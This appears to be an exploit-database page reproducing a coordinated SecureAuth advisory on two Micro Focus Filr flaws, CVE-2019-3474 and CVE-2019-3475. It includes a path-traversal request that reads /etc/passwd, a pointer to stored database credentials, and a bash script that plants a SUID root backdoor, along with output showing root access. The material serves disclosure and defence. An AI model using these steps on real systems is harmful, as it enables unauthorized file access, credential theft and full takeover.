Menu

Improved exploit search engine. Try it out

"Micro Focus Filr 3.4.0.217 - Path Traversal / Local Privilege Escalation"

Author

SecureAuth

Platform

linux

Release date

2019-02-22

Release Date Title Type Platform Author
2019-07-17 "Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting" webapps linux "Sarath Nair"
2019-07-17 "Linux - Broken Permission and Object Lifetime Handling for PTRACE_TRACEME" local linux "Google Security Research"
2019-07-16 "CentOS Control Web Panel 0.9.8.838 - User Enumeration" webapps linux "Pongtorn Angsuchotmetee_ Nissana Sirijirakal_ Narin Boonwasanarak"
2019-07-16 "CentOS Control Web Panel 0.9.8.836 - Privilege Escalation" webapps linux "Pongtorn Angsuchotmetee_ Nissana Sirijirakal_ Narin Boonwasanarak"
2019-07-16 "CentOS Control Web Panel 0.9.8.836 - Authentication Bypass" webapps linux "Pongtorn Angsuchotmetee"
2019-07-16 "PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)" remote linux Metasploit
2019-07-03 "Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)" local linux Metasploit
2019-07-01 "PowerPanel Business Edition - Cross-Site Scripting" webapps linux "Joey Lane"
2019-07-01 "Linux Mint 18.3-19.1 - 'yelp' Command Injection" remote linux b1ack0wl
2019-06-26 "Nagios XI 5.5.6 - Magpie_debug.php Root Remote Code Execution (Metasploit)" remote linux Metasploit
2019-06-20 "Cisco Prime Infrastructure Health Monitor - TarArchive Directory Traversal (Metasploit)" remote linux Metasploit
2019-06-20 "Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)" local linux Metasploit
2019-06-20 "Linux - Use-After-Free via race Between modify_ldt() and #BR Exception" dos linux "Google Security Research"
2019-06-18 "Serv-U FTP Server < 15.1.7 - Local Privilege Escalation" local linux "Guy Levin"
2019-06-17 "Exim 4.87 - 4.91 - Local Privilege Escalation" local linux "Marco Ivaldi"
2019-06-17 "Netperf 2.6.0 - Stack-Based Buffer Overflow" dos linux "Juan Sacco"
2019-06-14 "CentOS 7.6 - 'ptrace_scope' Privilege Escalation" local linux s4vitar
2019-06-11 "Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)" remote linux AkkuS
2019-06-10 "Ubuntu 18.04 - 'lxd' Privilege Escalation" local linux s4vitar
2019-06-05 "Exim 4.87 < 4.91 - (Local / Remote) Command Execution" remote linux "Qualys Corporation"
2019-06-05 "LibreNMS - addhost Command Injection (Metasploit)" remote linux Metasploit
2019-06-04 "Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution" local linux Arminius
2019-05-08 "NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass" webapps linux MobileNetworkSecurity
2019-05-08 "MiniFtp - 'parseconf_load_setting' Buffer Overflow" local linux strider
2019-05-03 "Blue Angel Software Suite - Command Execution" remote linux "Paolo Serracino_ Pietro Minniti_ Damiano Proietti"
2019-05-02 "Ruby On Rails - DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit)" remote linux Metasploit
2019-05-01 "CentOS Web Panel 0.9.8.793 (Free) / v0.9.8.753 (Pro) / 0.9.8.807 (Pro) - Domain Field (Add DNS Zone) Cross-Site Scripting" webapps linux DKM
2019-04-30 "Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification" dos linux "Google Security Research"
2019-04-26 "systemd - DynamicUser can Create setuid Binaries when Assisted by Another Process" dos linux "Google Security Research"
2019-04-23 "Linux - 'page->_refcount' Overflow via FUSE" dos linux "Google Security Research"
Release Date Title Type Platform Author
2019-03-01 "Cisco WebEx Meetings < 33.6.6 / < 33.9.1 - Privilege Escalation" local windows SecureAuth
2019-02-22 "Micro Focus Filr 3.4.0.217 - Path Traversal / Local Privilege Escalation" webapps linux SecureAuth
2018-10-29 "ASRock Drivers - Privilege Escalation" dos windows SecureAuth
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46450/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46450/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46450/40908/micro-focus-filr-340217-path-traversal-local-privilege-escalation/download/", "exploit_id": "46450", "exploit_description": "\"Micro Focus Filr 3.4.0.217 - Path Traversal / Local Privilege Escalation\"", "exploit_date": "2019-02-22", "exploit_author": "SecureAuth", "exploit_type": "webapps", "exploit_platform": "linux", "exploit_port": null}
                                            

For full documentation follow the link above

blog comments powered by Disqus

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

Micro Focus Filr Multiple Vulnerabilities

1. *Advisory Information*

Title: Micro Focus Filr Multiple Vulnerabilities
Advisory ID: SAUTH-2019-0001
Advisory URL: https://www.secureauth.com/labs/advisories/micro-focus-filr-multiple-vulnerabilities
Date published: 2019-02-20
Date of last update: 2019-02-20
Vendors contacted: Micro Focus
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Path traversal [CWE-22], Permissions, Privileges, and Access
Control [CWE-264]
Impact: Security bypass, Information leak
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2019-3474, CVE-2019-3475

3. *Vulnerability Description*

Novell (now part of Micro Focus [1]) website states that:
Micro Focus Filr [2] provides file access and sharing, and lets users
access their home directories and network folders from desktops, mobile
devices, and the Web. Users can also synchronize their files to their PC
or Mac. Changes that they make to downloaded copies are kept in sync
with the originals on their network file servers. And finally, users can
also share files internally and externally, and those with the share can
collaborate with each other by commenting on the files.

A vulnerability was found in the Micro Focus Filr Appliance, which would
allow an attacker with regular user access to read arbitrary files of
the filesystem. Furthermore, a vulnerability in the famtd daemon could
allow a local attacker to elevate privileges.

4. *Vulnerable Packages*

. Micro Focus Filr 3.4.0.217.
. Older versions are probably affected too, but they were not checked.

5. *Vendor Information, Solutions and Workarounds*

Micro Focus released Filr 3.0 Security Update 6 that addresses the
reported issues: https://download.novell.com/Download?buildid=nZUCSDkvpxk~

Also, Micro Focus published the following Security Notes:

. https://support.microfocus.com/kb/doc.php?id=7023726
. https://support.microfocus.com/kb/doc.php?id=7023727

6. *Credits*

These vulnerabilities were discovered and researched by Matias Choren
from SecureAuth. The publication of this advisory was coordinated by
Leandro Cuozzo from SecureAuth Advisories Team.

7. *Technical Description / Proof of Concept Code*

7.1. *Path Traversal*

[CVE-2019-3474]
The 'filename' parameter of the '/ssf/f/viewFile' endpoint is vulnerable
to Path Traversal attacks. An authenticated, low-privileged user may be
able to abuse this functionality in order to read arbitrary files on the
filesystem.

Proof of Concept:


1. As an authenticated user, upload a sample PDF file in the 'My Files'
section.
2. After the upload finishes, click on the small arrow next to the file
-> 'View Details'.
3. The browser will issue a few requests to the web application, one of
them being the one used for displaying the thumbnail of the file we've
just uploaded. This request has the following structure:

/-----
GET
/ssf/s/viewFile?binderId=44&entryId=1&entityType=folderEntry&fileId=8a82ada06851d92d016852b727f26b1b&viewType=image&filename=t154758084657912375035546628304890001.jpg
-----/

4. If the 'viewType' parameter is set to 'image', as in this case, we
can escape the current directory and include arbitrary files, as long as
they are readable by the 'wwwrun' user (the user Apache Tomcat is
currently running as). For example, we could read the '/etc/passwd' file:

/-----
GET
/ssf/s/viewFile?binderId=44&entryId=1&entityType=folderEntry&fileId=8a82ada06851d92d016852b727f26b1b&viewType=image&filename=../../../../../../../../../../../etc/passwd
HTTP/1.1
Host: 10.2.45.32:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=803689DA9BA5DA9CBA2B7DD246A50531
Connection: close
-----/

/-----
HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-UA-Compatible: IE=Edge
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Strict-Transport-Security: max-age=0
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Type: image/jpeg
Date: Mon, 21 Jan 2019 14:53:37 GMT
Connection: close
Server: Filr
Content-Length: 1506

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash

<...>
-----/

5. Also, an interesting file to look for would be
'/vastorage/conf/vaconfig.zip'. This zip file contains a bunch of
different configuration files, including 'mysql-liquibase.properties'
which, among other things, defines connection parameters such as the
username and password (base64 encoded) for the MySQL database:

/-----
referencePassword==?UTF-8?B?Zmlscg==?=
referenceUrl=jdbc:mysql://localhost:3306/filr?useUnicode=true&characterEncoding=UTF-8
url=jdbc:mysql://localhost:3306/filr?useUnicode=true&characterEncoding=UTF-8
password==?UTF-8?B?Zmlscg==?=
driver=com.mysql.jdbc.Driver
referenceUsername=filr
referenceDriver=com.mysql.jdbc.Driver
username=filr
-----/

7.2. *Local Privilege Escalation*

[CVE-2019-3475]
As per the description: 'novell-famtd provide CIFS & NCP file access
support for Filr server to request and respond to HTTP request coming
from Filr Client/ Browser'. This daemon runs during startup and can be
abused to elevate privileges on a Filr appliance.

Proof of Concept:

1. The 'famtd' binary located at '/opt/novell/filr/bin/' and its
containing folder are owned by the 'wwwrun' user, as can be seen next:

/-----
wwwrun@filr:/opt/novell/filr/bin> ls -lha
total 196K
drwxr-x--- 2 wwwrun www 4,0K ene 21 17:22 .
drwxr-x--- 8 wwwrun www 4,0K ene 14 18:41 ..
-rwxr-x--- 1 wwwrun www  23K feb  8  2017 famtconfig
-rwxr-x--- 1 wwwrun www 117K ene 14 18:19 famtd
-rwxr-x--- 1 wwwrun www  905 feb  8  2017 famt_log_config.sh
-rwxr-x--- 1 wwwrun www  31K jun 21  2018 kablink-teaming-tools.jar
wwwrun@filr:/opt/novell/filr/bin>
-----/

2. This binary is referenced and later executed in the
'/etc/init.d/novell-famtd' init script, meaning that it will run with
root privileges on startup:

/-----
#
# /etc/init.d/novell-famtd
#

<...>

# Check for missing binaries (stale symlinks should not happen)
# Note: Special treatment of stop for LSB conformance
FAMT_BIN=/opt/novell/filr/bin/famtd

<...>

## Start daemon with startproc(8). If this fails
## the return value is set appropriately by startproc.
ulimit -c unlimited
/sbin/startproc $FAMT_BIN

<...>
-----/

3. If an attacker manages to run arbitrary commands on the Filr
appliance as the 'wwwrun' user, they could replace the
'/opt/novell/filr/bin/famtd' binary with, for example, a custom bash
script that writes a SUID backdoor on the filesystem:

/-----
#!/bin/bash

# C snippet for setting group and user identity to 'root'
FILE="/tmp/exp.c"

/bin/cat <<EOM >$FILE
#include <unistd.h>

int main(void) {
        setgid(0);
        setuid(0);
        setegid(0);
        execl("/bin/bash", "bash", 0);
}
EOM

# Compile it
gcc /tmp/exp.c -o /tmp/exp

# Set suid bit
chmod -c 4755 /tmp/exp

# Call the original famtd daemon
/opt/novell/filr/bin/famtd.back
-----/

4. After a server reboot, we can run '/tmp/exp' and get root privileges
on the server:

/-----
wwwrun@filr:/tmp> id
uid=30(wwwrun) gid=8(www) groups=8(www)
wwwrun@filr:/tmp> ls -lha
total 96K
drwxrwxrwt 18 root         root         4,0K ene 21 17:15 .
drwxr-xr-x 27 root         root         4,0K ene 21 14:14 ..

<...>

-rwsr-xr-x  1 root         root          12K ene 21 17:14 exp
-rw-r--r--  1 root         root          137 ene 21 14:14 exp.c

<...>

wwwrun@filr:/tmp> ./exp
filr:/tmp # id
uid=0(root) gid=0(root) groups=0(root),8(www)
filr:/tmp #
-----/

8. *Report Timeline*
2019-01-23: SecureAuth sent an initial notification to Micro Focus including a draft advisory.
2019-01-23: Micro Focus acknowledged reception of initial contact.
2019-01-24: Micro Focus confirmed the reported vulnerabilities and
informed that they were aiming to deliver a patch around mid February.
2019-01-23: SecureAuth thanks the reply.
2019-02-11: SecureAuth asked for an update.
2019-02-11: Micro Focus replied saying that they were expecting to release the patch by the end of the week.
2019-02-11: SecureAuth proposed to set the publication date for next week.
2019-02-13: Micro Focus confirmed February 20th as the release date.
2019-02-20: Advisory SAUTH-2019-0001 published.

9. *References*

[1] https://www.microfocus.com/novell/
[2] https://www.novell.com/documentation/filr-3/filr-overvw/data/what_is_filr.html

10. *About SecureAuth Labs*

SecureAuth Labs, the research arm of SecureAuth Corporation, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct research in several important areas of
computer security, including identity-related attacks, system
vulnerabilities and cyber-attack planning. Research includes problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. We regularly publish security
advisories, primary research, technical publications, research blogs,
project information, and shared software tools for public use at
http://www.secureauth.com.

11. *About SecureAuth*

SecureAuth is leveraged by leading companies, their employees, their
customers and their partners to eliminate identity-related breaches.
As a leader in access management, SecureAuth is powering an identity
security revolution by enabling people and devices to intelligently
and adaptively access systems and data, while effectively keeping bad
actors from doing harm. By ensuring the continuous assessment of risk
and enablement of trust, SecureAuth's highly flexible platform makes
it easier for organizations to prevent the misuse of credentials. To
learn more, visit www.secureauth.com, call (949) 777-6959,
or email us at info@secureauth.com

12. *Disclaimer*

The contents of this advisory are copyright (c) 2019 SecureAuth, and are
licensed under a Creative Commons Attribution Non-Commercial Share-Alike
3.0 (United States) License: